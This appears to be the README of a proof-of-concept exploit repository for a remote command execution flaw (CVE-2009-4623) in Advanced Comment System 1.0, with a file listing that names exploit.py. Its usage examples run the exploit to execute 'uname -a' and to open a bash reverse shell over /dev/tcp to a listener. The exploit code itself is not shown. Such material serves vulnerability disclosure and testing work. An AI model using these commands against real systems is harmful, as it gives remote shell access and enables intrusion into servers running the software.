Advanced Comment System 1.0 - Remote Command Execution (RCE) # Advanced Comment System 1.0 - Remote Command Execution (RCE)
> https://nvd.nist.gov/vuln/detail/CVE-2009-4623
## Examples
```bash
python3 exploit.py http://127.0.0.1 uname -a
```
```bash
python3 exploit.py http://127.0.0.1 'bash -i >& /dev/tcp/127.0.0.1/443 0>&1'
```
[4.0K] /data/pocs/00c86148bee7c284c5f118c17fb46ac14099b0cb
├── [1.7K] exploit.py
├── [1.0K] LICENSE
└── [ 272] README.md
0 directories, 3 files